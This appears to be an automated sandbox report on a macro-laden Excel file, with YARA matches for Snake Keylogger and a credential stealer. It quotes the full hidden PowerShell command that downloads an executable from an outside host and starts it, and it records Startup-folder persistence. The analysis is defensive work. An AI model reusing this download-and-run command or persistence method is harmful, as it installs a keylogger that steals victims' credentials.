Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.425256294.000000001AB43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: tmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: tmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr	String found in binary or memory: https://www.ssl.com/repository0

Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163

System Summary

Source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000005.00000002.489076925.000000000297A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000008.00000002.515916889.00000000026ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: tmp7752.exe PID: 3756, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: tmp7752.exe PID: 3756, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: svcost.exe PID: 3928, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: svcost.exe PID: 3928, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Source: 7qsPAygCOx.xlsx	OLE, VBA macro line: Set Hthql = CreateObject("WScript.Shell")
Source: BA230000.0.dr	OLE, VBA macro line: Set Hthql = CreateObject("WScript.Shell")

Source: 7qsPAygCOx.xlsx	Stream path 'VBA/ThisWorkbook' : found hex strings
Source: BA230000.0.dr	Stream path 'VBA/ThisWorkbook' : found hex strings

Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe

File dump: svcost.exe.5.dr 293066043

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\tmp7752.exe

Jump to dropped file

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Memory allocated: 770B0000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Memory allocated: 770B0000 page execute and read and write			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00208A10		5_2_00208A10
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_0020CAD8		5_2_0020CAD8
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00208A00		5_2_00208A00
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00613BD0		5_2_00613BD0
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_0064F0E8		5_2_0064F0E8
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_006408A8		5_2_006408A8
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00648250		5_2_00648250
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00640C56		5_2_00640C56
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00A90040		5_2_00A90040
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00A9C858		5_2_00A9C858
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00A919A3		5_2_00A919A3
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00A9D500		5_2_00A9D500
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00A9C088		5_2_00A9C088
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00A940F8		5_2_00A940F8
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00A90006		5_2_00A90006
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00A96858		5_2_00A96858
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00A94108		5_2_00A94108
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00A957C8		5_2_00A957C8
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00AACC20		5_2_00AACC20
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00AA7470		5_2_00AA7470
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00AAED30		5_2_00AAED30
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00D2C010		5_2_00D2C010
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00D28D48		5_2_00D28D48
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00D2C6A9		5_2_00D2C6A9
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00D278E0		5_2_00D278E0
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00D20040		5_2_00D20040
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00D2D228		5_2_00D2D228
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00D2C347		5_2_00D2C347
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00D28D40		5_2_00D28D40
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_04A70040		5_2_04A70040
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_05020006		5_2_05020006
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_05020040		5_2_05020040
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_0503E350		5_2_0503E350
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_0503DEF8		5_2_0503DEF8
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_002F8A10		8_2_002F8A10
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_002FCAD8		8_2_002FCAD8
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_002F8A00		8_2_002F8A00
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_002FDE08		8_2_002FDE08
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_0069D980		8_2_0069D980
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_006908A8		8_2_006908A8
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00690898		8_2_00690898
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_0069D970		8_2_0069D970
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00690C56		8_2_00690C56
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_0211C858		8_2_0211C858
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_02110040		8_2_02110040
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_021119A3		8_2_021119A3
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_0211D500		8_2_0211D500
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_02110007		8_2_02110007
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_02116858		8_2_02116858
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_0211C088		8_2_0211C088
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_021140F8		8_2_021140F8
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_02114108		8_2_02114108
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_021157C8		8_2_021157C8
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_0212CC20		8_2_0212CC20
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_0212CC0F		8_2_0212CC0F
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_0212EC89		8_2_0212EC89
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_0212ED30		8_2_0212ED30
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_0212ED20		8_2_0212ED20
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_02127558		8_2_02127558
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_023AC020		8_2_023AC020
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_023AD219		8_2_023AD219
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_023AC347		8_2_023AC347
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_023A0040		8_2_023A0040
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_023A78E0		8_2_023A78E0
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_023A8D48		8_2_023A8D48
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_023A8D40		8_2_023A8D40
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_044B0040		8_2_044B0040
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_05400040		8_2_05400040
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_0540001A		8_2_0540001A
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_0541E350		8_2_0541E350
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_0541DEF8		8_2_0541DEF8

Source: 7qsPAygCOx.xlsx	OLE, VBA macro line: Private Sub Workbook_Open()
Source: BA230000.0.dr	OLE, VBA macro line: Private Sub Workbook_Open()

Source: 7qsPAygCOx.xlsx	OLE indicator, VBA macros: true
Source: BA230000.0.dr	OLE indicator, VBA macros: true

Source: 7qsPAygCOx.xlsx	Stream path 'VBA/__SRP_0' : https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -Out*File $TempFile; St*art-Proce*ss $TempFile;,^WScript.Shellqa1"hExecF
Source: BA230000.0.dr	Stream path 'VBA/__SRP_0' : https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -Out*File $TempFile; St*art-Proce*ss $TempFile;,^WScript.ShellQa1"hExecF

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\tmp7752.exe 13CB2135790780947BE355C3C9ED42BE1987C9E64D6CD0C43A5A4C5AE289DC30

Source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000005.00000002.489076925.000000000297A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000008.00000002.515916889.00000000026ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: tmp7752.exe PID: 3756, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: tmp7752.exe PID: 3756, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: svcost.exe PID: 3928, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: svcost.exe PID: 3928, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: tmp7752.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: svcost.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.tmp7752.exe.e40000.0.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 5.2.tmp7752.exe.e40000.0.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 5.2.tmp7752.exe.e40000.0.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 5.2.tmp7752.exe.e40000.0.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.tmp7752.exe.e40000.0.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 5.2.tmp7752.exe.e40000.0.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@8/14@1/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$7qsPAygCOx.xlsx

Jump to behavior

Source: C:\Users\user\AppData\Roaming\svcost.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC927.tmp

Jump to behavior

Source: 7qsPAygCOx.xlsx	OLE indicator, Workbook stream: true
Source: BA230000.0.dr	OLE indicator, Workbook stream: true

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..................V...............V.................O...........			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..................V...............V.................O...........			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..................V...............V.................O...........			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: 7qsPAygCOx.xlsx

ReversingLabs: Detection: 47%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\tmp7752.exe "C:\Users\user\AppData\Local\Temp\tmp7752.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\svcost.exe "C:\Users\user\AppData\Roaming\svcost.exe"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\tmp7752.exe "C:\Users\user\AppData\Local\Temp\tmp7752.exe"			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\svcost.exe "C:\Users\user\AppData\Roaming\svcost.exe"			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll			Jump to behavior
